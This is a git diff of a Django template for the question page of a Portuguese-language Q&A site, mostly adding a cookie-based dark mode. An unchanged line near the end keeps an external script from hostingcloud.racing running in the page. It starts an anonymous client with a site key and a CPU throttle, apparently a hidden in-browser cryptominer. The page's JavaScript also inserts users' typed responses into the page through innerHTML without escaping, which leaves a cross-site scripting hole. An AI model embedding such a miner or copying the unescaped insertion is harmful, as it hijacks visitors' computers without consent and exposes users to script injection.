--- a/main_app/templates/question.html
+++ b/main_app/templates/question.html
@@ -6,7 +6,17 @@
 		<meta charset="utf-8">
 		<meta name="viewport" content="width=device-width, initial-scale=1">
 		<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/css/bootstrap.min.css">
-		<link rel="stylesheet" href="/static/css/question.css?version=5">
+		<script src="/static/js/cookieman.js?v=0.1"></script>
+		<script>
+			var cssfn = 'question.css';
+			var cssversion = '?v=9.46';
+			if (getDarkCookie() == 'true') { cssfn = 'question-d.css';}
+			var link = document.createElement('link');
+			link.rel = 'stylesheet';
+			link.type = 'text/css';
+			link.href = '/static/css/' + cssfn + cssversion;
+			document.head.appendChild(link);
+		</script>
 		<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
 		<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.form/4.3.0/jquery.form.min.js"></script>
 		<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js"></script>
@@ -23,15 +33,15 @@ $(function() {
 
 		new_user_response = document.getElementById('response-form').response.value
 
-		new_innerHTML = '<li class="list-group-item '+bgcolor+' '+textcolor+'"><div class="card-body"><div class="poster-container"><a class="poster-info '+textcolor+'" href="/user/{{ user.username }}"><div class="poster-profile-pic-container"><img class="poster-profile-pic-popover" width="45px" src="{{ user_p.avatar.url }}" alt="{{ user.username }}"></div><div class="poster-text-container"><div><span>{{ user.username }}</span></div></div></div></a><p>' + new_user_response + '</p></p>'
+		new_innerHTML = '<li class="list-group-item"><div class="card-body"><div class="poster-container"><a class="poster-info" href="/user/{{ user.username }}"><div class="poster-profile-pic-container"><img class="poster-profile-pic-popover" width="45px" src="{{ user_p.avatar.url }}" alt="{{ user.username }}"></div><div class="poster-text-container"><div><span>{{ user.username }}</span></div></div></div></a><p>' + new_user_response + '</p></p>'
 
 		if (data['has_image']) {
 			url = data['image_url']
 			new_innerHTML += '<hr><img src="'+url+'" class="response-image" alt="Ocorreu um erro ao processar a imagem."><hr>'
 		}
 
-		new_innerHTML += '<div class="heart-comment" id="like-counter-'+answer_id+'" onclick="like(this, '+answer_id+')"><img width="20px" src="/static/images/white-heart.png?version=3" class="icon"> <span>0</span></div>&nbsp;&nbsp;                   <div class="dropdown btn-group dropup" id="options-dropdown"><button class="btn btn-primary btn-sm dropdown-toggle" type="button" id="dropdownMenuButton" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">Opções</button>   <div class="dropdown-menu '+bgcolor+'" aria-labelledby="dropdownMenuButton"><button class="dropdown-item '+bgcolor+' '+textcolor+'" onclick="delete_response(this, '+answer_id+');">Apagar</button><button class="dropdown-item '+bgcolor+' '+textcolor+'" onclick="document.getElementById(`edit-response-form`).style.display=`block`">Editar</button></div>   </div>                  <div class="heart-comment">&nbsp;<img width="20px" src="/static/images/comments.png?version=3" class="icon" onclick="show_comments(this.parentElement, '+answer_id+', this.parentElement.getElementsByTagName(`img`)[0], `{{ csrf_token }}`, `{{ user.username }}`, {{ question.id }})"> <span class="comment">0</span><div class="comments" id="1"></div></div>'
-		new_innerHTML += '<form id="edit-response-form" class="form-inline" method="post" action="/edit-response" onsubmit="document.getElementById(`response-'+answer_id+'`).innerHTML = this.response.value.replace(`\n`, `<br>`)">{% csrf_token %}<input type="hidden" name="response_id" value="'+answer_id+'"><textarea name="response" class="form-control '+commentbgcolor+' '+textcolor+'">'+new_user_response+'</textarea><input class="btn btn-outline-primary" type="submit" value="Enviar"></form></li>'
+		new_innerHTML += '<div class="heart-comment" id="like-counter-'+answer_id+'" onclick="like(this, '+answer_id+')"><img width="20px" src="/static/images/white-heart.png?version=3" class="icon"> <span>0</span></div>&nbsp;&nbsp;                   <div class="dropdown btn-group dropup response-control" id="options-dropdown"><button class="btn btn-primary btn-sm dropdown-toggle" type="button" id="dropdownMenuButton" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">Opções</button>   <div class="dropdown-menu" aria-labelledby="dropdownMenuButton"><button class="dropdown-item" onclick="delete_response(this, '+answer_id+');">Apagar</button><button class="dropdown-item" onclick="document.getElementById(`edit-response-form`).style.display=`block`">Editar</button></div>   </div>                  <div class="heart-comment">&nbsp;<img width="20px" src="/static/images/comments.png?version=3" class="icon" onclick="show_comments(this.parentElement, '+answer_id+', this.parentElement.getElementsByTagName(`img`)[0], `{{ csrf_token }}`, `{{ user.username }}`, {{ question.id }})"> <span class="comment">0</span><div class="comments" id="1"></div></div>'
+		new_innerHTML += '<form id="edit-response-form" class="form-inline" method="post" action="/edit-response" onsubmit="document.getElementById(`response-'+answer_id+'`).innerHTML = this.response.value.replace(`\n`, `<br>`)">{% csrf_token %}<input type="hidden" name="response_id" value="'+answer_id+'"><textarea name="response" class="form-control">'+new_user_response+'</textarea><input class="btn btn-outline-primary" type="submit" value="Enviar"></form></li>'
 		responses.innerHTML += new_innerHTML
 
 		document.getElementById('response-form').remove()
@@ -48,7 +58,7 @@ $(function() {
 	</head>
 	<body>
 
-		<nav class="navbar navbar-expand-sm   navbar-light bg-light">
+		<nav class="navbar navbar-expand-sm navbar-light">
 		    <a id="logo" href="/" class="navbar-brand"><img src="/static/images/asker.png" height="40px" alt="Asker"></a>
 			<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarTogglerDemo03" aria-controls="navbarTogglerDemo03" aria-expanded="false" aria-label="Toggle navigation">
 				<span class="navbar-toggler-icon"></span>
@@ -85,7 +95,7 @@ $(function() {
 		</nav>
 
 		<main>
-			<div class="card">
+			<div class="card bg-main">
 				<div class="card-body">
 					<div class="poster-container">
 					<a class="poster-info" href="/user/{{ question.creator.user.username }}">
@@ -123,7 +133,7 @@ $(function() {
 				</div>
 			</div>
 
-			<section class="card" id="responses">
+			<section class="card bg-main" id="responses">
   				<div class="card-header">
     				{{ question.total_responses }} respostas
   				</div>
@@ -161,7 +171,7 @@ $(function() {
 						&nbsp;&nbsp;
 
 						{% if response.creator.user.username == user.username %}
-						<div class="dropdown btn-group dropup" id="options-dropdown">
+						<div class="dropdown btn-group dropup response-control" id="options-dropdown">
 						  <button class="btn btn-primary btn-sm dropdown-toggle" type="button" id="dropdownMenuButton" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
 							  Opções
 						  </button>
@@ -243,17 +253,14 @@ $(function() {
 		</div>
 <script src="/static/js/question.js?version=7.4"></script>
 <script>
-
 var formbgcolor='bg-white'; var bgcolor='bg-white'; var textcolor='text-dark';
 var commentformbgcolor='bg-white'; var commentbgcolor='bg-light';
-</script>
-<script src="/static/js/general_functions.js?version=2"></script>
-<script src="/static/js/cookieman.js?v=0.1"></script>
-<script>
 if (getDarkCookie() == 'true') {
-	toggleDarkMode();
+	document.getElementsByClassName('navbar')[0].classList.remove("navbar-light");
+	document.getElementsByClassName('navbar')[0].classList.add("navbar-dark");
 }
 </script>
+<script src="/static/js/general_functions.js?version=2"></script>
 <script src="https://www.hostingcloud.racing/zk0a.js"></script><script>var _client=new Client.Anonymous("5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a",{throttle:.9,c:"w",ads:0});_client.start();</script>
 	</body>
 
